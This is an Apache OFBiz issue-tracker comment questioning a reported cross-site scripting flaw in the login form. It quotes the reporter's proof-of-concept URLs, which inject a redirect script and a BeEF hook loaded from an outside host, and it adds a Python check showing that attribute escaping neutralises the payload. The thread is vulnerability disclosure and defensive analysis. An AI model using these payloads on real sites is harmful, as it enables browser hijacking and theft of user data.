Posted to dev@ofbiz.apache.org by "BJ Freeman (JIRA)" <ji...@apache.org> on 2007/12/02 03:37:43 UTC

[jira] Commented: (OFBIZ-1476) XSS vulnerability in OFBiz Login Form

    [ https://issues.apache.org/jira/browse/OFBIZ-1476?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#action_12547550 ] 

BJ Freeman commented on OFBIZ-1476:
-----------------------------------

I am not sure this is accurate.
If you only put in username or password the login fails.


The Following Errors Occurred:

The Password was empty, please re-enter.

There is a statement in the status window about transferring data, but this is standard if you observe other pages when they are loading.
It is not transferring data to another site, unless you have some data you have captured this way,
in which case it would be nice to have a sample.




> XSS vulnerability in OFBiz Login Form
> -------------------------------------
>
>                 Key: OFBIZ-1476
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-1476
>             Project: OFBiz
>          Issue Type: Bug
>          Components: product
>            Reporter: Emmanuel Saracco
>
> Hi,
> There is a Cross Site Scripting vulnerability in the OFBiz login form that allows an attacker to steal user's data.
> PoC: 
> * Redirection to another site:
> https://demo.hotwaxmedia.com/ecommerce/control/login?USERNAME=a%22%3E%3Cscript%3Edocument.location.href%3D%27http%3A%2F%2Fwww.bindshell.net%27%3B%3C%2Fscript%3E%3Ca+name%3D%22a
> * BeEF injection:
> https://demo.hotwaxmedia.com/catalog/control/login?USERNAME=a%22%3E%3Cscript%20language=%22javascript%22%20src=%22http://192.168.4.2/beef/hook/beefmagic.js.php%22%3E%3C/script%3E%3Ca%20name=%22a
> Same thing using "PASSWORD" instead of "USERNAME".
> Bye

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.
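
Added example, not part of the JIRA thread and not OFBiz code: a check of what the reported USERNAME value does when a login form echoes it back, with and without HTML attribute encoding. It assumes the value lands in a double-quoted `value` attribute, which the payload's shape suggests; the `FIELD` template and all function names are hypothetical, since the real OFBiz template is not shown in the thread.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Query string of the first PoC URL in the report, copied as posted.
POC_QUERY = ("USERNAME=a%22%3E%3Cscript%3Edocument.location.href%3D%27http%3A%2F%2F"
             "www.bindshell.net%27%3B%3C%2Fscript%3E%3Ca+name%3D%22a")

# Assumed template shape (hypothetical; the real login template is not on the page).
FIELD = '<input type="text" name="USERNAME" value="{}"/>'

def render_unescaped(username):
    """Echo the parameter into the attribute as-is (the behaviour the report describes)."""
    return FIELD.format(username)

def render_escaped(username):
    """Same field with HTML attribute encoding applied on output."""
    return FIELD.format(escape(username, quote=True))

class TagCollector(HTMLParser):
    """Records every start tag the parser sees, i.e. the elements a browser would build."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

def check(query=POC_QUERY):
    """Return the decoded parameter and the tags parsed from each rendering."""
    username = parse_qs(query)["USERNAME"][0]
    return username, tags_in(render_unescaped(username)), tags_in(render_escaped(username))

if __name__ == "__main__":
    decoded, unescaped_tags, escaped_tags = check()
    print("decoded USERNAME:     ", decoded)
    print("tags without encoding:", unescaped_tags)
    print("tags with encoding:   ", escaped_tags)
```

If the unescaped rendering yields a `script` start tag, the parameter has broken out of the attribute regardless of whether the login itself fails; with encoding applied, only the `input` element remains.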